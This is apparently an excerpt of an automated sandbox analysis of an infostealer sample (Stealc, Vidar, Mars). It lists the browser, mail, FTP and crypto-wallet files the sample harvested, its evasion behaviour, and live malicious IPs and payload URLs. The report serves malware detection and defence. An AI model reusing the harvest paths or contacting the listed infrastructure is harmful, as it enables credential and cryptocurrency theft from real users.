Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2340, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1433619231.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1436568097.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2340, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.file.exe.920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1433619231.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2340, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1467951 Sample: file.exe Startdate: 05/07/2024 Architecture: WINDOWS Score: 100 59 Snort IDS alert for network traffic 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Found malware configuration 2->63 65 15 other signatures 2->65 8 file.exe 37 2->8         started        13 explorti.exe 2->13         started        15 explorti.exe 2->15         started        17 explorti.exe 2->17         started        process3 dnsIp4 45 85.28.47.30, 49699, 80 GES-ASRU Russian Federation 8->45 47 77.91.77.81, 49700, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 8->47 37 C:\Users\user\AppData\...\JDGCFBAFBF.exe, PE32 8->37 dropped 39 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->39 dropped 41 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 8->41 dropped 43 11 other files (7 malicious) 8->43 dropped 75 Detected unpacking (changes PE section rights) 8->75 77 Tries to steal Mail credentials (via file / registry access) 8->77 79 Found many strings related to Crypto-Wallets (likely being stolen) 8->79 87 4 other signatures 8->87 19 cmd.exe 1 8->19         started        21 cmd.exe 2 8->21         started        81 Hides threads from debuggers 13->81 83 Tries to detect sandboxes / dynamic malware analysis system (registry check) 13->83 85 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 13->85 file5 signatures6 process7 process8 23 JDGCFBAFBF.exe 4 19->23         started        27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        file9 35 C:\Users\user\AppData\Local\...\explorti.exe, PE32 23->35 dropped 67 Antivirus detection for dropped file 23->67 69 Detected unpacking (changes PE section rights) 23->69 71 Machine Learning detection for dropped file 23->71 73 5 other signatures 23->73 31 explorti.exe 12 23->31         started        signatures10 process11 dnsIp12 49 77.91.77.82, 51497, 51498, 51499 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 31->49 51 Antivirus detection for dropped file 31->51 53 Detected unpacking (changes PE section rights) 31->53 55 Tries to detect sandboxes and other dynamic analysis tools (window names) 31->55 57 5 other signatures 31->57 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
85.28.47.30
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.30/69934896f997d5bb/softokn3.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/freebl3.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.30/69934896f997d5bb/nss3.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/sqlite3.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/vcruntime140.dll true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
85.28.47.30/920475a59bac849d.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/920475a59bac849d.php true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/msvcp140.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.30/69934896f997d5bb/mozglue.dll true
  • Avira URL Cloud: malware
 unknown